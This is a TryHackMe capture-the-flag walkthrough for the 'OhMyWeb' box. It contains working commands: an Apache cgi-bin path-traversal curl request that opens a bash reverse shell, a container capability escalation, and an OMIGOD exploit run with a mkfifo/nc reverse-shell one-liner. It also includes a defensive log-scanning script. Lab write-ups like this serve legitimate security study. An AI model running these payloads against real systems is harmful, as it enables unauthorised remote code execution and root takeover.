Tryhackme: OhMyWeb Walkthrough

Vineeth Bharadwaj P
4 min read · Mar 7, 2022

This is a medium-level box built around some very well-known vulnerabilities from 2021. Upon initial exploitation, we end up in a docker container, where we find the user flag. We then break out of the docker container to get to the root flag.

Link to the box: Oh My WebServer

Enumeration

I do a quick nmap scan and there are only 2 services running.

nmap -sV -sC -T4 -vv -Pn -oN nmap_quick 10.10.58.139
nmap scan results

Opening the IP address in the browser takes us to the following site. I tried messing around with the text boxes on the site, but nothing interesting turned up.

Enumerating directories with ffuf, the cgi-bin/ directory gave a possible clue for the exploit.

Enumerating directories

ffuf -w /usr/share/seclists/Discovery/Web-Content/common.txt -u http://10.10.58.139:445/FUZZ
ffuf

Exploit

By looking at the Apache version, I realised it is vulnerable to the Apache path traversal vulnerability.

I ran the following to confirm the vulnerability.

Apache path traversal vulnerability

Now, to get the reverse shell, I started a netcat listener, and ran the following:

curl -v 'http://10.10.219.238/cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/bin/bash' -d 'echo Content-Type: text/plain; echo; bash -i >& /dev/tcp/10.13.32.76/4444 0>&1' -H "Content-Type: text/plain"
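As an added defender-side example (not part of the original post), the following Python scans Apache access-log lines for the `.%2e/` traversal pattern used in the request above and flags the cgi-bin-to-shell variant separately; the log lines are constructed samples, and the decode loop generalizes slightly to nested percent-encodings.

```python
import posixpath
import re
from urllib.parse import unquote

# Constructed Apache combined-format log lines (sample data, not from the post's target).
SAMPLE_LOG = """\
10.13.32.76 - - [07/Mar/2022:10:01:02 +0000] "GET /index.html HTTP/1.1" 200 1234 "-" "Mozilla/5.0"
10.13.32.76 - - [07/Mar/2022:10:01:05 +0000] "GET /cgi-bin/.%2e/.%2e/.%2e/.%2e/etc/passwd HTTP/1.1" 200 1810 "-" "curl/7.81.0"
10.13.32.76 - - [07/Mar/2022:10:01:09 +0000] "POST /cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/bin/bash HTTP/1.1" 200 0 "-" "curl/7.81.0"
10.13.32.76 - - [07/Mar/2022:10:02:00 +0000] "GET /cgi-bin/printenv?x=1 HTTP/1.1" 200 512 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
                    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3})')
SHELLS = {"bash", "sh", "dash"}


def full_decode(path, max_rounds=3):
    # Decode until stable so .%2e and nested forms like .%%32%65 both become '..'.
    for _ in range(max_rounds):
        decoded = unquote(path)
        if decoded == path:
            break
        path = decoded
    return path


def classify_path(raw_path):
    """None (benign), 'traversal' (a '..' segment survives decoding) or 'rce'."""
    decoded = full_decode(raw_path.split("?", 1)[0])
    if ".." not in decoded.split("/"):
        return None
    # The post's vector: traverse out of /cgi-bin/ to a shell, which mod_cgi then
    # executes with the POST body as its stdin.
    resolved = posixpath.normpath(decoded)
    if decoded.startswith("/cgi-bin/") and posixpath.basename(resolved) in SHELLS:
        return "rce"
    return "traversal"


def scan_log(text):
    """Return a finding dict for every suspicious request line."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        kind = classify_path(m["path"]) if m else None
        if kind:
            findings.append({"ip": m["ip"], "ts": m["ts"], "method": m["method"],
                             "status": m["status"], "path": m["path"], "kind": kind})
    return findings
```

Running `scan_log(SAMPLE_LOG)` returns two findings, the first tagged `traversal` and the second `rce`; a 200 status on such a request is the point at which to escalate.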

I stabilized the reverse shell, and started looking around.
Looks like we are inside a docker container.

Next, to elevate our privileges inside the container, I listed the enabled capabilities and found the way in. I used this to get root in the docker container.
Note: we are not root on the actual machine yet; this is just the docker container.

getcap -r / 2>/dev/null
root in docker

Searching inside the docker container, I found the user flag.

find / -type f -name "user.txt" 2>/dev/null
cat /root/user.txt
user.txt

Escalation

We need to break out of the docker container to find the root flag. When I ran ifconfig, I came across the local IPs we can enumerate and exploit.

First, we need static binaries for the enumeration.

You can get the static binaries here: https://github.com/andrew-d/static-binaries/tree/master/binaries/linux/x86_64

I uploaded the static binaries using the simple python http server trick.
Note: there is no wget in the docker container, so we have to use curl to fetch the binaries.

curl -v http://<target_ip>/nmap -o nmap
uploading static nmap binary

After uploading, I make the binary executable:

chmod +x ./nmap

Upon scanning a small IP address range, I find the interesting IP address I can try to exploit.

./nmap 172.17.0.0-5
nmap scan of ip addresses

Some more enumeration on the IP address using nmap:

./nmap -p- --min-rate 5000 172.17.0.1
nmap scan of the possible target

We see 4 services running on this IP.
Searching for exploits for port 5986, I came across a lot of WinRM material, but none of it seemed relevant here. Then I came across the OMIGOD vulnerability (CVE-2021-38647).

The exploit is a simple python file, which you can download from here:
https://github.com/AlteredSecurity/CVE-2021-38647/blob/main/CVE-2021-38647.py

I downloaded it to my attack machine, and then uploaded it to the docker container.
Once the exploit is uploaded, running it is simple, and I got the root flag.

Bonus: reverse shell as root from the actual machine

There is a netcat binary 'nc' on the machine, which we can use to get another reverse shell as the root user from the actual machine.

I set up another netcat listener on port 1111 on my attack machine and ran the following command:

python3.7 omi.py -t 172.17.0.1 -c 'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|bash -i 2>&1|nc 10.13.32.76 1111 >/tmp/f'

Now, I have the reverse shell as root from the actual machine :)

reverse shell as root from actual machine

Vineeth Bharadwaj P

Automotive/I.T Security. Artist. Photographer. Germany/India